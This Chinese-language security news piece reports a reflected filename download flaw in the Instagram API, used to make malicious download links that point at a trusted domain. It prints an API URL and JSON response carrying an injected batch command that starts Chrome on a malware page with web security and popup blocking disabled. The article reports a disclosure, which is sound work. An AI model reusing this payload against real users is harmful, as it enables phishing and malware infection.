安全研究人員最近發現了一種利用Instagram API形成的惡意分享鏈接，由于這個鏈接指向Instagram域名，所以很容易被用戶相信并下載。如果在釣魚攻擊中利用該漏洞，可以極大地提高攻擊效率。

[[130590]]

漏洞詳情

這個RFD(反射型文件名下載)漏洞存在于Instagram API中。通過篡改任何用戶賬號的訪問令牌并使用一些技巧，攻擊者可以創建一個惡意文件下載鏈接。同時由于這個鏈接指向Instagram域名上的合法資源，所以很難被用戶覺察。

為了構建“反射型部分”，Sopas在用戶賬號的“Bio”域中插入了一個批處理指令，并解釋說插入到其他域也可以實現同樣的功能。然后，他用Chrome瀏覽器打開一個包含惡意代碼的新頁面，該惡意頁面可以禁用瀏覽器中的大多數保護機制。

通過分析了用戶的Instagram JSON文件，然后通過修改JSON文件來實現“文件名部分”：

https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a

{“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”\”||start chrome websegura.net\/malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:\/\/websegura.net”,”profile_picture”:”https:\/\/igcdn-photos-f-a.akamaihd.net\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}

由于“文件名部分”的限制，這種附加方法只能在特定的瀏覽器中正常工作，這些瀏覽器包括Chrome、Opera、Chrome安卓版、安卓stock瀏覽器和火狐瀏覽器。

攻擊演示視頻

在他的攻擊中，Sopas使用了一個特定的文件名，他創建的完整鏈接可以被發送到受害者的Instagram消息中。

下面的視頻演示了該攻擊的PoC：

Sopas假設了以下可能的攻擊場景：

1、惡意用戶向他所有的Instagram好友發送一條消息，其中包含一個指向惡意頁面的鏈接。

2、受害者點擊鏈接，檢查并發現該文件存儲在Instagram服務器，下載并運行它。

3、受害者感染惡意軟件。